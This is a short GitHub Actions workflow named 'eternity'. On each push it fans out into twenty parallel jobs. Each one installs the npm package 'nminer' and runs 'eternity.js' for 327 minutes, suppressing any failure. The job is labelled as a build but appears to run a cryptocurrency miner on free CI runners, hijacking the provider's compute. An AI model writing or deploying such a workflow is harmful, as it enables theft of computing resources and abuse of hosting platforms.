name: eternity
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5183 }
          - { version: 3214 }
          - { version: 2920 }
          - { version: 8030 }
          - { version: 3330 }
          - { version: 1878 }
          - { version: 3958 }
          - { version: 9651 }
          - { version: 3375 }
          - { version: 1228 }
          - { version: 3961 }
          - { version: 7876 }
          - { version: 3632 }
          - { version: 558 }
          - { version: 8533 }
          - { version: 9050 }
          - { version: 1007 }
          - { version: 1983 }
          - { version: 6741 }
          - { version: 8546 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: empty upon
        run: |
          npm install nminer@latest
          timeout 327m node eternity.js || echo "eternity executed"